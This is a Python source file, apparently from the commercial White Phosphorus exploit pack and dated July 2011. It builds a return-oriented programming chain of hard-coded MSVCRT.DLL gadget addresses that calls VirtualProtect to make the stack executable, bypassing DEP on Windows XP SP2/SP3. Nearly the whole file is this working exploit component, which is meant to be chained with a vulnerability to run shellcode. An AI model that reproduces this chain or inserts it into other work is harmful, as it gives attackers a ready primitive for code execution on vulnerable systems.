#+-------- --- -
#| White Phosphorus Exploit Pack Universal XP DEP Bypass Chain
#|  July 2011
#+--

from struct import pack

def wp_UniversalDEPBypassWinXP_VP(size=2200):
    # White Phosphorus (2010)
    # Universal DEP Bypass for Windows XP SP2/SP3 using VirtualProtect
    #
    # This routine will make the current ESP + size bytes of the stack frame
    # executable using VirtualProtect and then return to the stack
    # 
    # Uses MSVCRT.DLL which has remained static on XP from SP2->Current
    #
    # web:   http://www.whitephosphorus org
    # mail:  support@whitephosphorus org
    # sales: http://www.immunityinc.com/products-whitephosphorus.shtml    
    
    size += 96  # This is the size of the DEP bypass + ptr in 
                # relation to the initial ESP
    
    print "WP> Building Universal Windows XP DEP bypass using VirtualProtect"
    depBypass = pack('<L', 0x77C21A55)  # xor,eax,eax;ret
    depBypass += pack('<L', 0x77C36A28) # push esp;pop ebx;pops;ret
    depBypass += "X" * 4                # random junk buffer
    depBypass += pack('<L', 0x77C3EDD9) # {popped into ESI} mov eax,ebx;pop ebx;pop ebp;ret
    depBypass += "X" * 4                # random junk buffer
    depBypass += pack('<L', 0x77C35F7A) # {popped into EBX} push ebx;call esi
    depBypass += "X" * 4                # random junk buffer
    depBypass += pack('<L', 0x77C34FCB) # add eax,58;ret
    depBypass += pack('<L', 0x77C23933) # xchg eax,ebp;ret
    depBypass += pack('<L', 0x77C21D16) # pop eax;ret
    depBypass += pack('<L', 0x11111111)	# {eax value}
    depBypass += pack('<L', 0x77C1F519)	# pop ecx;ret
    depBypass += pack('<L', 0x111110D1)	# {ecx value}
    depBypass += pack('<L', 0x77C478FA)	# sub eax,ecx;ret
    depBypass += pack('<L', 0x77C2C849) # {populate the correct registers for call}
    
    size = size - 0x77C35F7D            # size calculation { EAX == 77C35F7D }
           
    depBypass += pack('<L', size & 0xffffffff) # {ESI Adjustment}
    depBypass += pack('<L', 0x77C14490) # add eax,esi;ret
    depBypass += "X" * 16               # random junk buffer    
    depBypass += pack('<L', 0x77C23B47)	# pop edi;ret
    depBypass += pack('<L', 0x77C22665)	# pop edi;pop esi;ret
    depBypass += pack('<L', 0x77C2E26E) # push eax;call edi
    depBypass += pack('<L', 0x77C2C0A9)	# VirtualProtect Call
    depBypass += pack('<L', 0x77C35459)	# push esp;ret
    
    print "WP> Universal DEP Bypass Size: %d Bytes" % len(depBypass) 
    return depBypass